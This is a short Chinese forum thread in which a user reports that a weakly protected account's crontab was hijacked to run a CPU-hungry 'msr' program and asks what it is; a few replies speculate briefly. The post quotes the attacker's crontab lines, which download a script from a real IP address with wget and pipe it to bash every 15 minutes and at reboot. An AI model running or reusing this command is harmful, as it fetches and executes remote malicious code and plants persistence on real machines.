好久没登录了, 今天发现很卡,就发现有个简单密码的用户的 crontab 被改了执行一个 msr 程序:
crontab -l: */15 * * * * [ "$(ps -fe|grep msr|grep -v grep|wc -l)" -eq 0 ] && wget -qO - http://185.43.207.36/.d/test.sh | bash @reboot [ "$(ps -fe|grep msr|grep -v grep|wc -l)" -eq 0 ] && wget -qO - http://185.43.207.36/.d/test.sh | bash
那个 test.sh 可以下载,没看懂内容, 只知道执行了一个 msr 的程序特别耗 CPU;
没看出来这是啥东西. 谁帮忙给介绍下.
1
opengps 2020-01-16 21:11:26 +08:00
不知道是种什么脚本,不知道执行的程序是不是通过脚本下载的
|
2
neighbads 2020-01-17 09:17:40 +08:00 1
|
3
yanheqi 2020-01-19 02:19:50 +08:00
为什么会被入侵?密码太简单被破解?
|